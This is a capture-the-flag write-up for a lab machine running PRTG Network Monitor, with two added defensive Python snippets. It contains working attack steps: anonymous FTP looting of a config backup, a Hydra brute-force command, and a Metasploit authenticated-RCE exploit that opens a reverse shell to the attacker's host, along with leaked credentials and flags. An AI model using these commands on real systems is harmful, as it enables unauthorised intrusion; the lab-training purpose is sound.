Netmon
TARGET IP: 10.10.10.152
HOST IP: 10.10.16.5
RECON
NMAP
Start with an NMAP scan.
nmap [Target IP]

More detailed NMAP scan.
nmap -A -p 21,80,135,139,445 [Target IP]

Items to note in scan:
FTP uses Microsoft FTP and allows for anonymous login with what looks like a lot of directories available for browsing.
Port 80 is open with a title of PRTG Network Monitor (NETMON).
Port 445 is an SMB service with possible default credentials open.
I decided to run a more thorough scan on Port 445 to see what versions of SMB are running and whether I can exploit any of them.
nmap -p 445 --script smb-protocols [TARGET IP]

This shows that SMBv1 is allowed, which isn't supported anymore due to the number of vulnerabilities. Let's see if we can find any. See the exploits below.
FTP
ftp [Target IP]
Anonymous
<ENTER>
ls

Let's start by downloading any files not nailed down.
For some reason the .rnd file couldn't be downloaded, and viewing the file was just giving me garbage. Could be encoded.
get .rnd

less .rnd

cd Users
cd Public
get user.txt

On the host system open up the user.txt file for the flag.
cat user.txt
a9436db6e4461212b52f99f40c0767c5
It looks like I can't get access to any other good parts of the system without Administrator privileges.
Digging around more I found some useful credentials in the /Program Files (x86)/PRTG Network Monitor/cert directory.

This includes some keys for PRTG. However, after digging around, these look to be mainly used to secure communications and can't be used for login.
Maybe there is a way to monitor or capture traffic that we can then decrypt with the keys?
I grabbed a log file located at \Program Files (x86)\PRTG Network Monitor\PRTG Setup Log.log and tried to grep some key words. I think I got a hit on the admin's email address:
get "PRTG Setup Log.log"
cat "PRTG Setup Log.log" | grep admin

It looks like the admin's email address is na@na.com. I have no idea what I can use this for unfortunately.
Finally had to look up a hint. I fucking hate myself right now. Earlier on, I was trying to figure out if there was a way to see hidden files on the FTP server and didn't come across anything other than knowing what the hidden file is called.
I completely spaced on the fact that ProgramData is a hidden file on the root directory of Windows systems. Here is a website that tells you where to find the Data Directory for the program as well. I just didn't bother trying to access it even though I couldn't see it.
cd ProgramData
cd Paessler
cd "PRTG Network Monitor"
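Turning the FTP browsing above around into a detection: an added example (not from the original write-up) that parses IIS FTP W3C log lines, assuming the field layout given in the #Fields: header, and flags anonymous sessions that read paths like ProgramData or configuration backups. The log lines are constructed.

```python
from urllib.parse import unquote_plus

# Constructed sample of an IIS FTP W3C log (the field layout is assumed, not taken from the box).
# IIS writes spaces in URIs as '+', so "PRTG Network Monitor" shows up as PRTG+Network+Monitor.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2019-03-02 22:10:01 10.10.16.5 - 10.10.10.152 21 USER anonymous 331 0 0 s1 -
2019-03-02 22:10:01 10.10.16.5 anonymous 10.10.10.152 21 PASS *** 230 0 0 s1 /
2019-03-02 22:10:05 10.10.16.5 anonymous 10.10.10.152 21 RETR /Users/Public/user.txt 226 0 0 s1 -
2019-03-02 22:11:40 10.10.16.5 anonymous 10.10.10.152 21 CWD /ProgramData/Paessler 250 0 0 s1 -
2019-03-02 22:12:03 10.10.16.5 anonymous 10.10.10.152 21 RETR /ProgramData/Paessler/PRTG+Network+Monitor/PRTG+Configuration.old.bak 226 0 0 s1 -
2019-03-02 22:12:30 10.10.16.5 anonymous 10.10.10.152 21 RETR /ProgramData/Paessler/PRTG+Network+Monitor/PRTG+Configuration.dat 550 0 0 s1 -
"""

# Locations an anonymous FTP account has no business reading on a box like this one.
SENSITIVE_PREFIXES = ("/programdata/", "/program files", "/windows/")
SENSITIVE_SUFFIXES = (".bak", ".old", ".dat", ".log")
READ_METHODS = {"RETR", "CWD", "LIST", "NLST", "MLSD"}

def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields: header."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                records.append(dict(zip(fields, values)))
    return records

def is_sensitive(path):
    p = path.lower()
    if p.startswith("/users/") and not p.startswith("/users/public/"):
        return True
    return p.startswith(SENSITIVE_PREFIXES) or p.endswith(SENSITIVE_SUFFIXES)

def flag_anonymous_reads(records):
    """Anonymous-session reads (attempted or successful) of sensitive paths, in log order."""
    findings = []
    for r in records:
        if r["cs-username"].lower() != "anonymous" or r["cs-method"] not in READ_METHODS:
            continue
        path = unquote_plus(r["cs-uri-stem"])  # undo IIS URI encoding before matching
        if is_sensitive(path):
            findings.append({"time": r["date"] + " " + r["time"], "client": r["c-ip"],
                             "method": r["cs-method"], "path": path,
                             "status": int(r["sc-status"]), "succeeded": r["sc-status"].startswith("2")})
    return findings
```

Failed attempts (a 550 on a .dat file) are reported too, since an anonymous client probing ProgramData is worth a look even when the read is denied.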
In a zip file I found a chunk of information pertaining to the user prtgadmin:
</dateformat>
<email>na@na.com</email>
<fixed>1</fixed>
<grpfoldsize>10</grpfoldsize>
<homepage>/welcome.htm</homepage>
<lastlogin>43522.1088048495</lastlogin>
<login>prtgadmin</login>
<name>PRTG System Administrator</name>
<ownerid>100</ownerid>
<password>
<flags>
<encrypted/>
</flags>
<cell col="0" crypt="PRTG">JO3Y7LLK7IBKCMDN3DABSVAQO5MR5IDWF3MJLDOWSA======</cell>
<cell col="1" crypt="PRTG">OEASMEIE74Q5VXSPFJA2EEGBMEUEXFWW
Looks like the password gets encrypted but I wasn't able to decrypt it using Base64.
It's possible that I could use one of the keys I found to try to decrypt it with openssl.
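An added example, not part of the original write-up, for triaging a configuration backup like the one above: it inventories the accounts in a constructed fragment of the same shape (the <data>/<user> wrappers and the Delphi TDateTime epoch for lastlogin are assumptions), reports whether each password is flagged encrypted, and shows that the cells are base32-shaped ciphertext, so decoding them is not decryption.

```python
import base64
import binascii
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta
# Constructed fragment shaped like the block quoted above (the <data>/<user> wrappers are assumed);
# the prtgadmin values are the ones on this page, the second account is made up to show an unencrypted cell.
SAMPLE_CONFIG = """<data>
  <user id="100">
    <email>na@na.com</email>
    <lastlogin>43522.1088048495</lastlogin>
    <login>prtgadmin</login>
    <password>
      <flags><encrypted/></flags>
      <cell col="0" crypt="PRTG">JO3Y7LLK7IBKCMDN3DABSVAQO5MR5IDWF3MJLDOWSA======</cell>
      <cell col="1" crypt="PRTG">OEASMEIE74Q5VXSPFJA2EEGBMEUEXFWW</cell>
    </password>
  </user>
  <user id="101"><email>ops@example.invalid</email><login>ops-readonly</login>
    <password><cell col="0">NOTENCRYPTED</cell></password></user>
</data>"""

DELPHI_EPOCH = datetime(1899, 12, 30)  # assumed: lastlogin is a Delphi TDateTime day count

def delphi_to_datetime(serial):
    return DELPHI_EPOCH + timedelta(days=float(serial))

def b32_length(value):
    # Byte length after base32 decoding ('======' padding is base32, not base64); None if not base32.
    try:
        return len(base64.b32decode(value))
    except (binascii.Error, ValueError):
        return None

def audit_accounts(xml_text):
    """Inventory every account in a PRTG config backup and how its password is stored."""
    report = []
    for node in ET.fromstring(xml_text).iter():
        if node.find("login") is None:
            continue
        pw = node.find("password")
        last = node.findtext("lastlogin")
        report.append({
            "login": node.findtext("login"),
            "email": node.findtext("email"),
            "last_login": delphi_to_datetime(last).strftime("%Y-%m-%d %H:%M") if last else None,
            "encrypted": pw is not None and pw.find("flags/encrypted") is not None,
            # Decoding only strips the base32 shell; the bytes are still PRTG ciphertext, not the password.
            "cells": [(c.get("crypt"), b32_length(c.text or "")) for c in (pw.findall("cell") if pw is not None else [])],
        })
    return report
```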
Screw that. I found a file called PRTG Configuration.old.bak and grabbed it.
get "PRTG Configuration.old.bak"
nano "PRTG Configuration.old.bak"
^W
prtgadmin
PrTg@dmin2018
That didn't work either.
I fucking hate this lab right now. It's 12 at night. I have been banging my head on the table for 8 hrs now and this is what it gives me. Lesson learned.
I had to go back to the walkthrough again. Looks like I was in the right area but since this password didn't work, I should instead try variations on it.
I don't think I would have ever figured that out myself. I'll keep it in mind for next time but for fuck's sake.
Let's try PrTg@dmin2019. Well, what do you fucking know. It worked.
Well, good thing I know how to exploit it from this point on. Now that I have a set of credentials, I can jump over to Metasploit to gain admin privileges. Check out the Exploit notes below.

HTTP
In your web browser:
http://[Target IP]

Looks like we have a login page. Here is the Wappalyzer.

Checking out the source code for the page gives us some interesting information.
Unfortunately, nothing that really stood out.
I googled some default credentials for the PRTG Network Monitor and got prtgadmin:prtgadmin. Unfortunately, none of these worked. I also tried some other usual credentials but no luck. I will come back to this in the enumeration.
I've been beating my head on the table for a while on this one. I eventually checked out the Forgot Password link and tried the username credential above, prtgadmin.

When I try other usernames though, I get the following message. This means that there is definitely a username of prtgadmin.

I attempted to use Hydra to brute force the password and came up with a lot of different answers, which was weird. Unfortunately, none of these worked.
hydra -l prtgadmin -P [PATH TO WORDLIST] [TARGET IP] http-post-form "/public/login.htm:username=^USER^&password=^PASS^:Your login has failed. Please try again'!'"

Enumeration
Gobuster
No luck here for some odd reason.
gobuster dir -u http://[Target IP]/ -w /usr/share/dirb/wordlists/common.txt

I even tried excluding the error codes and wasn't getting anything back.
gobuster dir -u http://[Target IP]/ -w /usr/share/dirb/wordlists/common.txt -b 302,404,500
Exploit
PRTG
I found an exploit to gain administrator privileges to the system through the PRTG account using CVE-2018-9276. There is also a Metasploit exploit that can leverage this. However, I need to already be logged into an administrator account.
The link above references CVE-2018-19410, which allows you to create a new admin user account, but I only found one written-down PoC and it unfortunately did not work for me.
I gained credentials from browsing the FTP site:
prtgadmin:PrTg@dmin2019
Let's jump over to Metasploit to gain admin privileges.
msfconsole
search prtg
use exploit/windows/http/prtg_authenticated_rce
show options
set admin_password PrTg@dmin2019
set rhosts [TARGET IP]
set lhost [HOST IP]
exploit
You should now have a Meterpreter reverse shell. Type the following to get a command shell and verify you are the Administrator.
shell
whoami
SMB
The NMAP scan shows that SMBv1 is allowed.
I checked to see if it was vulnerable to EternalBlue but no luck using Metasploit.
I also checked on a few others.
I also tried logging into the SMB client with the guest account, as the NMAP scan showed it available, but it looks as though it has been disabled.

Type the following to see the root.txt file.
type C:\Users\Administrator\Desktop\root.txt
adb0e6563ee3febfeb2f0f5ef82e9dcc
